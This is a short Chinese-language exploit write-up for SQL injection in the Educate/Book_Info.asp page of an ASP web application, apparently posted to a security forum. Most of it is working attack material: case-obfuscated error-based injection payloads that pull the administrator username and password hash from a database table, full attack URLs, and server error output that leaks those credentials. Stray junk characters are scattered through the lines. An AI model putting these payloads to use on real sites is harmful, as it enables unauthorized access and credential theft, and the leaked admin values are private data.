漏洞出现在Educate/Book_Info.asp
6 E1 h- L+ q4 ]此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
/ J. Y5 a9 q2 c# D: W- J2 Texp:如下$ r9 s; E; H% \/ S9 Z+ C. }
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
+ K/ w, b( Z4 S; v查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
4 f+ _: ~) f) p5 G" N$ Y2 {http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)1 \, \; k5 d/ y7 J
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'4 \4 y* R f1 G. J
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
2 C' Q% _5 N9 z N/Educate/Book_Info.asp,行 8
) v% k* x% w# R2 w$ B1 l6 I; vhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)' }) W( T. p7 F
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'5 Z* N' J) {7 N9 d/ b6 p6 X5 r; x
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
, z' [0 i- L/ y/Educate/Book_Info.asp,行 8 |